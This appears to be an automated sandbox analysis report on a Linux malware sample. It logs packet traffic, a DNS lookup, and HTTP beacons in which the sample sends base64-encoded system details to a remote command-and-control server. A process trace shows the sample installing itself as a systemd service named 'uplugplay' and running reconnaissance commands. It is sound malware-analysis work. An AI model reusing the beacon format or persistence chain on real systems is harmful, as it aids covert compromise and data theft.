                                                              Mar 31, 2025 11:43:11.216114998 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:11.315896034 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:11.335275888 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:11.335319042 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:11.370527029 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:11.438942909 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:11.439016104 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:11.453731060 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:11.528065920 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:11.540069103 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:11.556564093 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:11.556616068 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:11.635867119 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:11.768007994 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:11.870393038 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:11.870410919 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:11.870584011 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:11.870584011 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:11.972039938 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:11.972136021 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:11.986449003 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:11.986505985 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:12.065185070 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:12.082091093 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:12.082148075 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:12.177825928 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:12.197860956 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:12.197932005 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:12.232398033 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:12.297662020 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:12.297831059 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:12.315377951 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:12.383887053 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:12.398245096 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:12.414804935 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:12.414861917 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:12.484121084 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:12.484138966 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:12.484308958 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:12.516140938 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:12.516156912 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:12.516360044 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:12.620713949 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:12.620732069 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:12.620795965 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:12.620795965 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:12.735246897 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:12.735326052 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:13.175324917 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:13.175455093 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:13.301151991 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:13.301244020 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:13.407043934 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:13.407280922 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:13.511850119 CEST43928443192.168.2.2391.189.91.42
                                                              Mar 31, 2025 11:43:13.517457008 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:13.534348011 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:13.534512043 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:13.639120102 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:13.662724018 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:13.662808895 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:13.760438919 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:13.760490894 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:13.760658026 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:13.782645941 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:13.782682896 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:13.782847881 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:13.857076883 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:13.857218027 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:13.857286930 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:13.880223989 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:13.880275965 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:13.880337954 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:13.958100080 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:13.958117962 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:13.958281994 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:13.990526915 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:13.990544081 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:13.990688086 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:14.056314945 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:14.056334019 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:14.056440115 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:14.087506056 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:14.087517023 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:14.087634087 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:14.155452967 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:14.155467033 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:14.155642033 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:14.188406944 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:14.188416004 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:14.188488007 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:14.211805105 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:14.255011082 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:14.255023956 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:14.255152941 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:14.288829088 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:14.288839102 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:14.288932085 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:14.339606047 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:14.355561018 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:14.355607033 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:14.355689049 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:14.388235092 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:14.388247013 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:14.388354063 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:14.438018084 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:14.438029051 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:14.438242912 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:14.457034111 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:14.457159042 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:14.462410927 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:14.586152077 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:15.129014015 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:15.129291058 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:15.227530003 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:15.227791071 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:16.233738899 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:16.233738899 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:16.333458900 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:16.333475113 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:16.333486080 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:16.333751917 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:16.334013939 CEST44355242199.232.90.49192.168.2.23
                                                              Mar 31, 2025 11:43:16.337745905 CEST55242443192.168.2.23199.232.90.49
                                                              Mar 31, 2025 11:43:18.934401035 CEST39246443192.168.2.2334.249.145.219
                                                              Mar 31, 2025 11:43:18.934442043 CEST4433924634.249.145.219192.168.2.23
                                                              Mar 31, 2025 11:43:18.934637070 CEST39246443192.168.2.2334.249.145.219
                                                              Mar 31, 2025 11:43:18.934753895 CEST39246443192.168.2.2334.249.145.219
                                                              Mar 31, 2025 11:43:18.934765100 CEST4433924634.249.145.219192.168.2.23
                                                              Mar 31, 2025 11:43:23.750417948 CEST42836443192.168.2.2391.189.91.43
                                                              Mar 31, 2025 11:43:29.893501043 CEST4251680192.168.2.23109.202.202.202
                                                              Mar 31, 2025 11:43:54.466001034 CEST43928443192.168.2.2391.189.91.42
                                                              Mar 31, 2025 11:44:14.943111897 CEST42836443192.168.2.2391.189.91.43
                                                              Mar 31, 2025 11:44:18.926312923 CEST39246443192.168.2.2334.249.145.219
                                                              Mar 31, 2025 11:44:18.968300104 CEST4433924634.249.145.219192.168.2.23
                                                              Mar 31, 2025 11:45:11.626019955 CEST4433924634.249.145.219192.168.2.23
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Mar 31, 2025 11:45:09.706681013 CEST5886453192.168.2.238.8.8.8
                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Mar 31, 2025 11:45:09.706681013 CEST192.168.2.238.8.8.80x1870Standard query (0)xinchaodbcfda.comA (IP address)IN (0x0001)false
                                                              • 152.36.128.18
                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              0192.168.2.2358304152.36.128.1880
                                                              TimestampBytes transferredDirectionData
                                                              Mar 31, 2025 11:43:04.024481058 CEST76OUTGET /cgi-bin/p.cgi?r=15&i=8458VTJT921KQOYZ HTTP/1.0
                                                              Host: 152.36.128.18
                                                              Mar 31, 2025 11:43:04.248692036 CEST179INHTTP/1.1 200 OK
                                                              Date: Mon, 31 Mar 2025 09:43:04 GMT
                                                              Server: Apache/2.4.41 (Win64)
                                                              Content-Length: 7
                                                              Connection: close
                                                              Content-Type: text/html; charset=windows-1251
                                                              Data Raw: 73 79 73 69 6e 66 6f
                                                              Data Ascii: sysinfo


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1192.168.2.2358306152.36.128.1880
                                                              TimestampBytes transferredDirectionData
                                                              Mar 31, 2025 11:43:08.139599085 CEST691OUTGET /cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCjMwNjQyOTYga0INCnZtd2FyZQ0KDQoNCg0KVWJ1bnR1ICYgMjAuMDQuMiBMVFMgKEZvY2FsIEZvc3NhKSAgJiBidWxsc2V5ZS9zaWQgJiANCg0KL3Vzci9zYmluLw0KIyBkbWlkZWNvZGUgMy4yfDE3NDM0MTQxODYNCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=8458VTJT921KQOYZ&h=galassia&enckey=T3H7yKYl9LzrnzjTk1kj3/IIrRpU5KqKM2QjRbIrLf+P0lYOdKDUznLMbT8ikKacjb5gwGXO/3gz/i1RyBruWAkeC2wdEnkGfZcQyfTqx6El4sI9cXAdspx1OC0+58WLk+ZhXrGRzNnPEJGxk8bI6l8552kadBpr8dz0jWCByhs= HTTP/1.0
                                                              Host: 152.36.128.18
                                                              Mar 31, 2025 11:43:08.404761076 CEST224INHTTP/1.1 200 OK
                                                              Date: Mon, 31 Mar 2025 09:43:08 GMT
                                                              Server: Apache/2.4.41 (Win64)
                                                              Content-Length: 3
                                                              Connection: close
                                                              Content-Type: text/html; charset=windows-1251
                                                              Data Raw: 6f 6b 21 0d 0a 43 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 0a 0a
                                                              Data Ascii: ok!Content-type: text/html; charset=windows-1251


                                                              System Behavior

                                                              Start time (UTC):09:42:51
                                                              Start date (UTC):31/03/2025
                                                              Path:/tmp/na.elf
                                                              Arguments:/tmp/na.elf
                                                              File size:435932 bytes
                                                              MD5 hash:f754da11d56273194970ea9f6544059b

                                                              Start time (UTC):09:42:51
                                                              Start date (UTC):31/03/2025
                                                              Path:/tmp/na.elf
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:f754da11d56273194970ea9f6544059b

                                                              Start time (UTC):09:42:51
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c "pgrep na.elf"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:42:51
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:42:51
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/pgrep
                                                              Arguments:pgrep na.elf
                                                              File size:30968 bytes
                                                              MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                              Start time (UTC):09:42:52
                                                              Start date (UTC):31/03/2025
                                                              Path:/tmp/na.elf
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:f754da11d56273194970ea9f6544059b

                                                              Start time (UTC):09:42:52
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c "pidof na.elf"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:42:52
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:42:52
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/pidof
                                                              Arguments:pidof na.elf
                                                              File size:27016 bytes
                                                              MD5 hash:f58f67968fc50f1497f9ea9e9c22b6e8

                                                              Start time (UTC):09:42:54
                                                              Start date (UTC):31/03/2025
                                                              Path:/tmp/na.elf
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:f754da11d56273194970ea9f6544059b

                                                              Start time (UTC):09:42:54
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c "pgrep uplugplay"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:42:54
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:42:54
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/pgrep
                                                              Arguments:pgrep uplugplay
                                                              File size:30968 bytes
                                                              MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                              Start time (UTC):09:42:55
                                                              Start date (UTC):31/03/2025
                                                              Path:/tmp/na.elf
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:f754da11d56273194970ea9f6544059b

                                                              Start time (UTC):09:42:55
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c "pidof uplugplay"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:42:55
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:42:55
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/pidof
                                                              Arguments:pidof uplugplay
                                                              File size:27016 bytes
                                                              MD5 hash:f58f67968fc50f1497f9ea9e9c22b6e8

                                                              Start time (UTC):09:42:55
                                                              Start date (UTC):31/03/2025
                                                              Path:/tmp/na.elf
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:f754da11d56273194970ea9f6544059b

                                                              Start time (UTC):09:42:55
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c "pgrep upnpsetup"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:42:55
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:42:55
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/pgrep
                                                              Arguments:pgrep upnpsetup
                                                              File size:30968 bytes
                                                              MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                              Start time (UTC):09:42:57
                                                              Start date (UTC):31/03/2025
                                                              Path:/tmp/na.elf
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:f754da11d56273194970ea9f6544059b

                                                              Start time (UTC):09:42:57
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c "pidof upnpsetup"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:42:57
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:42:57
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/pidof
                                                              Arguments:pidof upnpsetup
                                                              File size:27016 bytes
                                                              MD5 hash:f58f67968fc50f1497f9ea9e9c22b6e8

                                                              Start time (UTC):09:42:59
                                                              Start date (UTC):31/03/2025
                                                              Path:/tmp/na.elf
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:f754da11d56273194970ea9f6544059b

                                                              Start time (UTC):09:42:59
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c "systemctl daemon-reload"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:42:59
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:42:59
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/systemctl
                                                              Arguments:systemctl daemon-reload
                                                              File size:996584 bytes
                                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                              Start time (UTC):09:43:00
                                                              Start date (UTC):31/03/2025
                                                              Path:/tmp/na.elf
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:f754da11d56273194970ea9f6544059b

                                                              Start time (UTC):09:43:00
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c "systemctl enable uplugplay.service"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:43:00
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:43:00
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/systemctl
                                                              Arguments:systemctl enable uplugplay.service
                                                              File size:996584 bytes
                                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                              Start time (UTC):09:43:01
                                                              Start date (UTC):31/03/2025
                                                              Path:/tmp/na.elf
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:f754da11d56273194970ea9f6544059b

                                                              Start time (UTC):09:43:01
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c "systemctl start uplugplay.service"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:43:01
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:43:01
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/systemctl
                                                              Arguments:systemctl start uplugplay.service
                                                              File size:996584 bytes
                                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                              Start time (UTC):09:43:00
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/lib/systemd/systemd
                                                              Arguments:-
                                                              File size:1620224 bytes
                                                              MD5 hash:9b2bec7092a40488108543f9334aab75

                                                              Start time (UTC):09:43:00
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                              Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                              File size:22760 bytes
                                                              MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                              Start time (UTC):09:43:01
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/lib/systemd/systemd
                                                              Arguments:-
                                                              File size:1620224 bytes
                                                              MD5 hash:9b2bec7092a40488108543f9334aab75

                                                              Start time (UTC):09:43:01
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                              Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                              File size:22760 bytes
                                                              MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                              Start time (UTC):09:43:01
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/lib/systemd/systemd
                                                              Arguments:-
                                                              File size:1620224 bytes
                                                              MD5 hash:9b2bec7092a40488108543f9334aab75

                                                              Start time (UTC):09:43:01
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/sbin/uplugplay
                                                              Arguments:/usr/sbin/uplugplay
                                                              File size:435932 bytes
                                                              MD5 hash:f754da11d56273194970ea9f6544059b

                                                              Start time (UTC):09:43:01
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/sbin/uplugplay
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:f754da11d56273194970ea9f6544059b

                                                              Start time (UTC):09:43:01
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/sbin/uplugplay
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:f754da11d56273194970ea9f6544059b

                                                              Start time (UTC):09:43:01
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c "/usr/sbin/uplugplay -Dcomsvc"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:43:01
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:43:01
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/sbin/uplugplay
                                                              Arguments:/usr/sbin/uplugplay -Dcomsvc
                                                              File size:435932 bytes
                                                              MD5 hash:f754da11d56273194970ea9f6544059b

                                                              Start time (UTC):09:43:02
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/sbin/uplugplay
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:f754da11d56273194970ea9f6544059b

                                                              Start time (UTC):09:43:02
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c hostnamectl
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:43:02
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:43:02
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/hostnamectl
                                                              Arguments:hostnamectl
                                                              File size:26848 bytes
                                                              MD5 hash:b1245aa6d3c28b5d5fedb2d681d32eb9

                                                              Start time (UTC):09:43:03
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/sbin/uplugplay
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:f754da11d56273194970ea9f6544059b

                                                              Start time (UTC):09:43:03
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c hostnamectl
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:43:03
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:43:03
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/hostnamectl
                                                              Arguments:hostnamectl
                                                              File size:26848 bytes
                                                              MD5 hash:b1245aa6d3c28b5d5fedb2d681d32eb9

                                                              Start time (UTC):09:43:05
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/sbin/uplugplay
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:f754da11d56273194970ea9f6544059b

                                                              Start time (UTC):09:43:05
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c "dmidecode --type baseboard"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:43:05
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:43:05
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/sbin/dmidecode
                                                              Arguments:dmidecode --type baseboard
                                                              File size:121856 bytes
                                                              MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                              Start time (UTC):09:43:05
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/sbin/uplugplay
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:f754da11d56273194970ea9f6544059b

                                                              Start time (UTC):09:43:05
